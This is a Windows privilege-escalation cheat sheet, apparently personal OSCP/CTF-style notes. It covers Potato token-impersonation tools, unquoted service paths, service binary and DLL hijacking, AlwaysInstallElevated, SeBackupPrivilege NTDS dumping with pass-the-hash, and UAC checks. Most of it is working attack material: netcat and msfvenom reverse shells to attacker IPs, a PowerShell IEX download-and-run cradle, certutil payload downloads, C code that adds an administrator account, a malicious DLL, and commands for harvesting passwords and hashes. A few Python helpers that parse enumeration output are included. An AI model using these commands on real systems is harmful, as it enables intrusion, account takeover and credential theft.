Windows PrivEsc Exploitation
Links
- Run As Blog
- GodPotato
- PrintSpoofer
- Unquoted Service Path
- Payload All The Things Win Priv
- UAC Bypass Info
- WADComs
- LOLBAS
Turn off Powershell Script Restrictions
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
Quick Wins
whoami /priv # Printspoofer
whoami /groups # UAC Bypass
findstr /si password *.txt *.ini *.config # passwords # BREAKS THE SHELL A LOT # AVOID
# Powershell history passwords
type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Is value 1? If yes, AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
icacls "test.exe" # Insecure file permission
Get-Acl C:\xampp\htdocs\logs | fl # Same as icacls but better
wsl whoami # Windows subsystem
cmdkey /list # Stored creds so do Runas
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Autologon creds
# Unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\"
wmic service list brief | findstr "Running" # Running services
netstat -ano # Ports only reachable locally? Forward them (Chisel)
# Low-level findings
Look in Temp; look in System32\config for SAM and SYSTEM; look for SSH keys.
Look at PowerShell history and at appcmd.exe in the winPEAS output.
Accesschk.exe
> accesschk.exe /accepteula -flag [FLAG]
# -u: suppress errors | -q: quiet; no banner | -v: verbose
# -w: write access objects only
# -c: windows service <>
# -d: directory <>
# -k: registry key <>
icacls
> icacls [FILE|DIR] [FLAG]
# /T - traverse all dir and files within the folder
# /grant USER:PERM
# /setowner USER
or copy permissions from another file or folder:
Get-Acl -Path C:\Folder1 | Set-Acl -Path C:\Folder2
Service Cmds
# configuration of service
> sc.exe qc SERVICE
# status of service
> sc.exe query SERVICE
# modify config
> sc.exe config SERVICE <key>= <value>
# start / stop / restart
> net [start/stop] SERVICE
> sc [start/stop] SERVICE
PS> Restart-Service -Name SERVICE
# is exe running with admin?
> tasklist /V | findstr FILE.exe
Password Loot
findstr /si password *.txt *.ini *.config # Password in text files
cmdkey /list
type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt # password
# All 3 below are golden (PowerShell)
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<steve>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
We can always switch to another user with the runas command and supply the password we found:
runas /user:backupadmin cmd # backupadmin is the user here
runas /savecred /user:admin cmd # Instead of cmd, try launching a reverse shell
# Password in registry keys
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Look for desktop.ini on every user's desktop; it sometimes contains a password (CTF-style).
Look for unattended.xml files
Look at PowerShell history and appcmd.exe on winpeas
Run As
Runas allows us to run a program as a different user. It can be used with local or domain accounts as long as that user is allowed to log on to the system.
cmdkey /list # List stored Creds on the machine
where runas.exe # If we find or have the password
# Example Stores Creds:
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
# Transfer msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
# Using the above Stored Creds:
runas /savecred /user:<USER found from cmdkey command above> "shell.exe"
# Change the path below; runas prompts for the password (it cannot be passed on the command line)
C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
# If the above doesn't work
runas /user:administrator cmd # Try this or below to get the reverse shell
runas /user:administrator "nc.exe -e cmd.exe <IP> 443"
# If the above doesn't work, try RunasCs
RunAsCs
https://github.com/antonioCoco/RunasCs/tree/master
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "shell.exe"
or use it to get a reverse shell:
.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.6:443 cmd
SeImpersonatePrivilege
# Detect
whoami /priv # See for SeImpersonatePrivilege to be enabled
If not, you might be able to use FullPowers to get this, like on the vulnlab media box:
https://seriotonctf.github.io/2023/10/19/Media-Vulnlab/
https://github.com/itm4n/FullPowers/releases/tag/v0.1
1. ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.0.210 443 -e cmd" -z
2. Catch the shell
3. From that shell, use GodPotato (or another Potato) to catch a second shell with the privilege escalation done.
4. .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"
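The detection step above (`whoami /priv`) and the later SeBackupPrivilege note ("SeBackupPrivilege is disabled") both come down to reading the token's privilege list correctly. The following is an added example, not code from this page or from any of the tools it links: a small Python triage script that parses `whoami /priv` output and reports the privileges this page treats as escalation paths. The sample output and the risk mapping are constructed for the example; it runs offline.

```python
import re

# Constructed sample of `whoami /priv` output (not captured from a real target)
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeBackupPrivilege             Back up files and directories             Disabled
"""

# Privileges this page treats as escalation paths when a low-privileged account
# holds them; the reasons summarise the page's own sections (assumed mapping).
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "token impersonation (PrintSpoofer, Potato family)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (Potato family)",
    "SeBackupPrivilege": "read any file, e.g. SAM/SYSTEM/NTDS hives",
    "SeRestorePrivilege": "write any file, e.g. service binaries",
    "SeManageVolumePrivilege": "raw volume access (SeManageVolumeExploit)",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_whoami_priv(text):
    """Map privilege name -> True (Enabled) / False (Disabled) from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs

def risky_privileges(text):
    """Return [(name, enabled, reason)] for each high-risk privilege in the token.
    A Disabled privilege is still reported: Disabled only means the current process
    has not turned it on; the token holder can normally enable it (which is what
    Set-SeBackupPrivilege does for SeBackupPrivilege later on this page)."""
    privs = parse_whoami_priv(text)
    return [(name, privs[name], HIGH_RISK_PRIVILEGES[name])
            for name in HIGH_RISK_PRIVILEGES if name in privs]

if __name__ == "__main__":
    for name, enabled, reason in risky_privileges(SAMPLE_WHOAMI_PRIV):
        state = "Enabled" if enabled else "Disabled"
        print(f"{name:<32} {state:<9} {reason}")
```

Feed it the real output with `whoami /priv > priv.txt` and `risky_privileges(open("priv.txt").read())`; the point of reporting Disabled privileges is that a `findstr Enabled` filter would miss exactly the SeBackupPrivilege case this page later enables by hand.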
## PrintSpoofer
https://github.com/itm4n/PrintSpoofer
# Attack, Transfer the PrintSpoofer64.exe
PrintSpoofer.exe -i -c cmd
.\PrintSpoofer32.exe -c "nc.exe 192.168.45.152 443 -e cmd"
## GodPotato
https://github.com/BeichenDream/GodPotato
# If PrintSpoofer doesn't work, try GodPotato (the most recent one)
.\GodPotato-NET35.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 443"
GodPotato-NET2.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 443"
GodPotato-NET4.exe -cmd "c:\wamp\www\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 443"
## JuicyPotato
https://github.com/ohpe/juicy-potato
Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.45.152 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.45.152 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
## Lovely Potato
https://github.com/TsukiCTF/Lovely-Potato
Quick Guide
First clone this repo to your attacker machine, which already has all of the required dependencies:
root@attacker:~# git clone https://github.com/TsukiCTF/Lovely-Potato.git
root@attacker:~# cd Lovely-Potato
Then modify the two following variables in 'Invoke-LovelyPotato.ps1' as below (attacker machine IP, writable path on the victim machine):
$RemoteDir = "http://[AttackerIP]
$LocalPath = "[WritablePathOnVictimMachine]"
Now create a meterpreter binary on the attacker machine or use any other executable reverse shell:
root@attacker:~/Lovely-Potato# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[AttackerIP] LPORT=[AttackerPort] -f exe -o meterpreter.exe
Start a web server in this repo to serve your meterpreter.exe and other dependencies:
root@attacker:~/Lovely-Potato# python3 -m http.server 80
On a new terminal, launch metasploit console (or any listener which handles whatever you are serving as a reverse shell):
root@attacker:~# msfdb run
msf5 > # I'm going to omit setting up the multi handler as it is something you should already know
Finally enter the command below on the victim's PowerShell console; you MUST WAIT 10 minutes for a reverse shell running as NT AUTHORITY\SYSTEM!
PS > IEX(New-Object Net.WebClient).DownloadString('http://[AttackerIP]/Invoke-LovelyPotato.ps1')
## RoguePotato
https://github.com/antonioCoco/RoguePotato
.\RoguePotato.exe -r 192.168.1.11 -l 9999 -e "C:\Windows\Temp\rev.exe"
## JuicyPotatoNG.exe
https://github.com/antonioCoco/JuicyPotatoNG
JuicyPotatoNG.exe -t * -p "nc64.exe" -a "-e cmd.exe 10.8.1.213 80"
Generic Potato from Cereal HTB
# A modified version of SweetPotato by @EthicalChaos to support impersonating authentication over HTTP and/or named pipes. This allows for local privilege escalation from SSRF and/or file writes.
.\GenericPotato.exe -p "c:\Users\sonny\Desktop\nc64.exe" -a "10.10.14.7 443 -e powershell" -e HTTP -l 8889
rlwrap nc -nvlp 443
curl -k -X "POST" -H "Content-Type: application/json" --data-binary '{"query":"mutation{updatePlant(plantId:2, version:2.2, sourceURL:\"http://localhost:8889\")}"}' 'http://localhost:8081/api/graphql'
SeManageVolumeExploit
Do this if you see SeChangeNotifyPrivilege ('Bypass traverse checking') enabled.
Full Control over C:\
https://github.com/xct/SeManageVolumeAbuse
https://github.com/CsEnox/SeManageVolumeExploit
For example:
certutil -urlcache -split -f http://192.168.45.173:9090/SeManageVolumeExploit.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
# Download tzres.dll into C:\windows\system32\wbem (run the next command from that directory):
certutil -urlcache -split -f http://192.168.45.173:9090/tzres.dll
Then trigger the DLL load by running:
systeminfo
Siren Notes on SeManageVolumeExploit
.bashrc
alias dllref='clear ; cat $HOME/ref/dllref'
This is potentially an incomplete list.
dllref (flat file):
=================================================================================
C:\Windows\System32\wpcoreutil.dll (Windows Insider service `wisvc`, triggered by clicking Start Windows Insider Program)
=================================================================================
C:\Windows\System32\phoneinfo.dll (Windows Problem Reporting service)
https://twitter.com/404death/status/1262670619067334656 (without reboot by @jonasLyk)
=================================================================================
#dxgi - Trigger is check for protection update
C:\Windows\System32\wbem\dxgi.dll (windows security -> check for protection update)
=================================================================================
#tzres.dll
C:\Windows\System32\wbem\tzres.dll (systeminfo, NetworkService)
=================================================================================
### Need to reboot to get NT AUTHORITY\SYSTEM (hijack dll) ###
C:\Windows\System32\wlbsctrl.dll (IKEEXT service)
C:\Windows\System32\wbem\wbemcomn.dll (IP Helper)
=================================================================================
C:\Windows\System32\ualapi.dll (spooler service)
http://www.hexacorn.com/blog/2016/11/08/beyond-good-ol-run-key-part-50/
=================================================================================
C:\Windows\System32\fveapi.dll (ShellHWDetection Service) @bohops
=================================================================================
C:\Windows\System32\Wow64Log.dll (this dll loaded by other third party services such as GoogleUpdate.exe)
http://waleedassar.blogspot.com/2013/01/wow64logdll.html
=================================================================================
#DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll
#Overwrite:
C:\Windows\System32\spool\drivers\x64\3\
#Trigger
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
=================================================================================
#ALL ABOVE REQUIRE ADMIN READ/WRITE
https://github.com/CsEnox/SeManageVolumeExploit/
SeManageVolumeExploit.exe
=================================================================================
SeBackupPrivilege
# Import libraries
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Get-SeBackupPrivilege # ...or whoami /priv | findstr Backup SeBackupPrivilege is disabled
# Enable SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
# List Admin folder for example and steal a file
dir C:\enterpriseadmin\desktop\
Copy-FileSeBackupPrivilege C:\Users\enterpriseadmin\desktop\\flag.txt c:\users\enterpriseuser\flag.txt -Overwrite
Do this to get the Admin hash:
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
nano raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
unix2dos raj.dsh
cd C:\Temp
upload raj.dsh
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
impacket-secretsdump -ntds ntds.dit -system system local
For the hash, use the NT hash, i.e. the fourth colon-separated field (the last one before the ":::"):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
evil-winrm -i 192.168.1.172 -u administrator -H "##Hash##"
evil-winrm -i 192.168.1.172 -u administrator -H "ee4457ae59f1e3fbd764e33d9cef123d"
Unquoted Service Path
-> If the path contains spaces and is not enclosed in double quotes, we can exploit it.
Example:
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
-> How the system tries to resolve an unquoted service path (each candidate in order):
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe
Detection
# PowerUp (Invoke-AllChecks and Get-UnquotedService are PowerUp functions)
Import-Module ./PowerUp.ps1
Invoke-AllChecks OR Get-UnquotedService
OR
wmic service get displayname,pathname
OR
# Best one
Get-CimInstance -ClassName win32_service | Select Name,State,PathName # Powershell
OR
# Best one
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\"
Found an unquoted service path? # A service with spaces in its path and no quotes
Write the path and service name in your notes first # Service name can be found with winPEAS or PowerUp
icacls "<Path of the file>"
Example: C:\Program Files\yolo Apps\Current Version\yolo.exe
# TRY IN THIS FASHION ONLY: check each parent folder, from the shortest to the longest path
-> icacls "C:\Program Files", then icacls "C:\Program Files\yolo Apps", and so on.
-> Once we see W (or anything stronger) on a folder, take the next path component and drop our binary there.
We want W for BUILTIN\Users, Authenticated Users, or our own username.
# Example
C:\Program Files\yolo Apps\Current Version\yolo.exe
icacls "C:\Program Files\yolo Apps" # Gives W on Users
Place a malicious Current.exe in the "C:\Program Files\yolo Apps" folder
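The check described above is mechanical enough to script: list services, keep the ones whose path is unquoted and contains a space, work out which truncated executables the service control manager would try, and see whether a low-privileged principal can write into the folder each one would live in. The block below is an added Python example (not code from this page, winPEAS or PowerUp) that does exactly that from saved `wmic` and `icacls` output, so it runs offline. The service table and ACL listings are constructed samples; the "Yolo Updater" service mirrors the page's yolo example.

```python
import re

# --- constructed sample of `wmic service get displayname,name,pathname,startmode` output ---
def _row(display, name, path, mode):
    # wmic pads every column to its widest value; fixed widths reproduce that layout
    return f"{display:<20}{name:<14}{path:<70}{mode}"

SAMPLE_WMIC = "\n".join([
    _row("DisplayName", "Name", "PathName", "StartMode"),
    _row("Windows Update", "wuauserv", "C:\\Windows\\system32\\svchost.exe -k netsvcs", "Auto"),
    _row("Yolo Updater", "YoloSvc", "C:\\Program Files\\yolo Apps\\Current Version\\yolo.exe", "Auto"),
    _row("Backup Agent", "BkSvc", "\"C:\\Program Files\\Backup Agent\\agent.exe\" -svc", "Auto"),
]) + "\n"

# --- constructed sample `icacls "<dir>"` output for the directories involved ---
SAMPLE_ICACLS = {
    "C:\\Program Files": (
        "C:\\Program Files NT SERVICE\\TrustedInstaller:(F)\n"
        "                 BUILTIN\\Administrators:(OI)(CI)(F)\n"
        "                 BUILTIN\\Users:(RX)\n"
        "                 BUILTIN\\Users:(OI)(CI)(IO)(GR,GE)\n\n"
        "Successfully processed 1 files; Failed processing 0 files\n"),
    "C:\\Program Files\\yolo Apps": (
        "C:\\Program Files\\yolo Apps BUILTIN\\Administrators:(I)(OI)(CI)(F)\n"
        "                           BUILTIN\\Users:(I)(OI)(CI)(RX)\n"
        "                           BUILTIN\\Users:(OI)(CI)(W)\n\n"
        "Successfully processed 1 files; Failed processing 0 files\n"),
}

WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}   # simple and specific write rights
LOW_PRIV = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone",
            "NT AUTHORITY\\INTERACTIVE"}

def parse_wmic_table(text):
    """Split wmic's column-aligned table into dicts using the header's column offsets."""
    lines = [l.rstrip() for l in text.splitlines() if l.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    rows = []
    for line in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            row[name] = line[start:end].strip()
        rows.append(row)
    return rows

def is_unquoted_with_spaces(pathname):
    """True when the path is not quoted and has a space somewhere before the .exe."""
    p = pathname.strip()
    exe_end = p.lower().find(".exe")
    return not p.startswith('"') and exe_end != -1 and " " in p[:exe_end]

def scm_candidates(pathname):
    """The executables the service control manager tries, in order, for an unquoted path."""
    binary = pathname[:pathname.lower().find(".exe") + 4]
    truncated = [binary[:i] + ".exe" for i, ch in enumerate(binary) if ch == " "]
    return truncated + [binary]

def parse_icacls(output, path):
    """Return [(principal, [rights...])] from `icacls "<path>"` output."""
    entries = []
    for line in output.splitlines():
        if line.startswith(path):
            line = line[len(path):]          # the first line carries the path itself
        m = re.match(r"^\s*(.+?):((?:\([^)]*\))+)\s*$", line)
        if m:
            rights = [r for grp in re.findall(r"\(([^)]*)\)", m.group(2)) for r in grp.split(",")]
            entries.append((m.group(1), rights))
    return entries

def low_priv_writers(output, path, current_user=None):
    """Low-privileged principals (plus current_user) holding a write right; DENY entries are skipped."""
    allowed = LOW_PRIV | ({current_user} if current_user else set())
    return [p for p, rights in parse_icacls(output, path)
            if p in allowed and "DENY" not in rights and WRITE_RIGHTS & set(rights)]

def audit(wmic_text, icacls_by_dir, current_user=None):
    """Per unquoted service path: (service, candidate exe, directory to write to, who can write there)."""
    findings = []
    for svc in parse_wmic_table(wmic_text):
        if not is_unquoted_with_spaces(svc["PathName"]):
            continue
        for cand in scm_candidates(svc["PathName"])[:-1]:     # the last entry is the real binary
            directory = cand.rsplit("\\", 1)[0]
            acl = icacls_by_dir.get(directory, "")
            findings.append((svc["Name"], cand, directory, low_priv_writers(acl, directory, current_user)))
    return findings

if __name__ == "__main__":
    for name, cand, directory, writers in audit(SAMPLE_WMIC, SAMPLE_ICACLS):
        print(f"{name}: {cand:<48} writable by {writers or 'nobody low-privileged'}")
```

On a real host save `wmic service get displayname,name,pathname,startmode > svc.txt` and `icacls "<dir>" > acl.txt` for each directory the candidates point at, then call `audit()` with those files. Note that the ACL check is deliberately the weak point: a directory that icacls reports as writable for `BUILTIN\Users` is the only finding that matters, and the `(I)`-inherited `RX` entries that look alarming in the output are ignored because they carry no write right.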
Exploitation
1) msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o Common.exe
OR
2) adduser.c from the shells module (see Insecure File permission below)
OR
3) msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
Victim machine:
1. Place common.exe in 'C:\Program Files\<Unquoted Path Service>'
# directly transfer it to place OR using move below
# move "C:\users\ted\zen.exe" "C:\program files\zen\zen.exe"
2. sc start <service_name> or Start-Service <service_name> # Powershell
# Just try placing the malicious binary first; the service may already restart on its own
# If that doesn't work, restart the service (see Service Cmds above)
3. net localgroup administrators # Check whether the user was added, or have nc listening for the shell
Scheduled Tasks
Detection
# Generally look for backup tasks; everything else is mostly noise
schtasks /query /fo LIST /v
# Look in Author, TaskName, Task To Run, Run As User, and Next Run Time fields.
OR
# PowerShell
Get-ScheduledTask | ft TaskName,TaskPath,State
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
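The `schtasks /query /fo LIST /v` output is verbose, and the page's advice is to read only a handful of fields (Author, TaskName, Task To Run, Run As User, Next Run Time). As an added example, not part of the original notes, here is a Python filter that parses the LIST format and keeps the enabled, non-Microsoft tasks that run as a privileged account and launch something outside %windir%, which is the subset worth an `icacls` check. The three-task sample is constructed and abridged to the fields used.

```python
# Constructed sample of `schtasks /query /fo LIST /v` output (three tasks, abridged fields)
SAMPLE_SCHTASKS = """\
Folder: \\
HostName:                             WIN-LAB
TaskName:                             \\Microsoft\\Windows\\Defrag\\ScheduledDefrag
Next Run Time:                        N/A
Status:                               Ready
Author:                               Microsoft Corporation
Task To Run:                          %windir%\\system32\\defrag.exe -c -h -o -$
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM

HostName:                             WIN-LAB
TaskName:                             \\BackupJob
Next Run Time:                        1/15/2024 2:00:00 AM
Status:                               Ready
Author:                               WIN-LAB\\Administrator
Task To Run:                          C:\\Scripts\\backup.exe /full
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM

HostName:                             WIN-LAB
TaskName:                             \\UserSync
Next Run Time:                        1/15/2024 9:00:00 AM
Status:                               Ready
Author:                               WIN-LAB\\bob
Task To Run:                          C:\\Tools\\sync.exe
Scheduled Task State:                 Enabled
Run As User:                          WIN-LAB\\bob
"""

PRIVILEGED_RUNAS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM", "ADMINISTRATOR"}

def parse_schtasks_list(text):
    """Split LIST output into one dict per task (a blank line ends a task)."""
    tasks, cur = [], {}
    for line in text.splitlines():
        if not line.strip():
            if cur:
                tasks.append(cur)
            cur = {}
            continue
        key, sep, val = line.partition(":")       # values may themselves contain ':' (times)
        if sep:
            cur[key.strip()] = val.strip()
    if cur:
        tasks.append(cur)
    return tasks

def runs_privileged(run_as):
    """SYSTEM or an account named Administrator (the 'Run As User' values this page cares about)."""
    r = run_as.upper()
    return r in PRIVILEGED_RUNAS or r.endswith("\\ADMINISTRATOR")

def interesting_tasks(text):
    """Enabled, non-Microsoft tasks that run privileged and launch a binary outside %windir%.
    Each hit is (TaskName, Run As User, Task To Run, Next Run Time)."""
    hits = []
    for t in parse_schtasks_list(text):
        name = t.get("TaskName", "")
        cmd = t.get("Task To Run", "").strip('"')
        if name.lower().startswith("\\microsoft\\"):
            continue
        if t.get("Scheduled Task State") != "Enabled" or not runs_privileged(t.get("Run As User", "")):
            continue
        if cmd.lower().startswith(("c:\\windows\\", "%windir%", "%systemroot%")):
            continue
        hits.append((name, t["Run As User"], t["Task To Run"], t.get("Next Run Time", "")))
    return hits

if __name__ == "__main__":
    for name, user, cmd, nxt in interesting_tasks(SAMPLE_SCHTASKS):
        print(f"{name} runs as {user} at {nxt}: {cmd} -> check icacls on the binary and its folder")
```

Run `schtasks /query /fo LIST /v > tasks.txt` on the host and pass the file contents to `interesting_tasks()`; the "Task To Run" value of each hit is the path to feed into the `icacls` step of the Exploitation list that follows.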
Exploitation
1) icacls <file.exe> # Do we have M or F on BUILTIN/USERS or Username?
2) Replace the file directly with adduser.exe or msfvenom shell
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<> -f exe -o Common.exe
AlwaysInstallElevated
# If the value for both is 1, then it's exploitable
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# Generate a malicious .msi and transfer to victim
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o evil.msi
# Put the file in C:\Windows\Temp
msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
# or try
evil.msi
# If doesn't work
-> Try a Different port like 21
-> Try Different Arch like x86 and x64
-> Try putting the file in tmp or the user's desktop
Insecure File permission
Powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\Program Files\test\bin\test.exe" # Path of the service binary
Get-Acl C:\xampp\htdocs\logs | fl # Same as icacls but better
Check to see if this application has BUILTIN\USERS permission. If yes, Boom - Jackpot!
# Get msfvenom and replace that file with the move command
# Craft the Attack, ON KALI
adduser.c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user evil password123 /add");
i = system ("net localgroup administrators evil /add");
return 0;
}
# Compile the code and transfer the binary to the Victim.
i686-w64-mingw32-gcc adduser.c -o adduser.exe
# Replace the service with our malicious binary on Victim.
move "C:\Program Files\test\bin\test.exe" "C:\Program Files\test\bin\test.exe.bak" # back up the original first
move adduser.exe "C:\Program Files\test\bin\test.exe"
dir "C:\Program Files\test\bin\"
# Restart the service
wmic service where caption='test' get name, caption, state, startmode
shutdown /r /t 0
net localgroup Administrators
Another Example of Binary and DLL Hijacking
Service Binary HiJacking
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\xampp\apache\bin\httpd.exe"
icacls "C:\xampp\mysql\bin\mysqld.exe"
//adduser.c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
iwr -uri http://192.168.45.225/adduser.exe -Outfile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
net stop mysql
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
whoami /priv
shutdown /r /t 0
Get-LocalGroupMember administrators
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
python3 -m http.server 80
iwr -uri http://192.168.45.225/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile
Install-ServiceBinary -Name 'mysql'
$ACL = Get-Acl -Path "Folder1"
$User = New-Object System.Security.Principal.Ntaccount("TestUser1")
$ACL.SetOwner($User)
$ACL | Set-Acl -Path "Folder1"
Get-ACL -Path "Folder1"
## Service DLL Hijacking
---
1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable.
Listing 56 - Standard DLL search order on current Windows versions
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls .\Documents\BetaServ.exe
Load Process Monitor to filter for service
Restart-Service BetaService
$env:path
---
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,             // Handle to DLL module
    DWORD ul_reason_for_call,   // Reason for calling function
    LPVOID lpReserved)          // Reserved
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: // A process is loading the DLL.
    {
        int i;
        i = system("net user dave2 password123! /add");
        i = system("net localgroup administrators dave2 /add");
        break;
    }
    case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH: // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
Listing 62 - C++ DLL example code from Microsoft
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
cd Documents
iwr -uri http://192.168.45.225/myDLL.dll -Outfile myDLL.dll
net user
Restart-Service BetaService
net user
net localgroup administrators
Gain Access DLL Hijacking
https://github.com/ptoomey3/evilarc/tree/master
This was from Bruno Vulnlab:
https://arz101.medium.com/vulnlab-bruno-f0129f60ac40
Basically just zip up a dll to a specific folder you have access to.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.154 LPORT=2222 -f dll > test.dll
python evilarc.py -d 1 -p app Microsoft.DiaSymReader.Native.amd64.dll
Windows Subsystem
wsl whoami
wsl python -c '<BIND_OR_REVERSE_SHELL_PYTHON_CODE>'
UAC Bypass
User Account Control - The effect of UAC is that any application that wishes to perform an operation with a potential system-wide impact, cannot do so silently. This one is UAC Bypass - Fodhelper.exe.
# Check which level - if medium level integrity shell
whoami /groups
where fodhelper.exe # Find the location of fodhelper.exe on the system
Exploitation
# This can sometimes directly give a high-integrity shell (one-time wonder: if it works, it works)
powershell.exe Start-Process cmd.exe -Verb runAs
Fodhelper.exe Bypass
# To see if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
# To see which level is configured
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
# Check for Medium Mandatory Level
whoami /groups | findstr Level
# Search for fodhelper.exe always
where /r C:\windows fodhelper.exe
# Run this to check Powershell x86 or x64
powershell [Environment]::Is64BitProcess
# If False
C:\Windows\sysnative\cmd.exe
